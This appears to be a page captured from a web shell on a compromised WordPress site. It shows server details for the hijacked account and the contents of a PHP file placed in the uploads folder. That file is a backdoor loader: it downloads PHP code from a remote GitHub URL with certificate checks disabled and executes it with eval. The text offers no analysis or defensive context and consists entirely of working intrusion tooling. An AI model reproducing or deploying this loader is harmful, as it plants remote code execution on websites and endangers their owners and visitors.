Done !
Server IP : 104.21.32.1 / Your IP : 216.73.216.2 Web Server : LiteSpeed System : Linux humblecpeu.securityframe.com 4.18.0-553.5.1.lve.1.el8.x86_64 #1 SMP Fri Jun 14 15:38:45 UTC 2024 x86_64 User : cleansav ( 1057) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/cleansav/public_html/wp-content/uploads/ |
Upload File : |
<?php $remote_url = 'https://raw.githubusercontent.com/unamexid/collect/main/x/wp-act.php'; function fetch_remote_code($url) { $code = false; if (ini_get('allow_url_fopen')) { $code = @file_get_contents($url); } if (!$code && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => 1, CURLOPT_SSL_VERIFYPEER => 0 ]); $code = curl_exec($ch); curl_close($ch); } return $code; } $code = fetch_remote_code($remote_url); if (!$code) die("Could not fetch code."); eval('?>' . $code);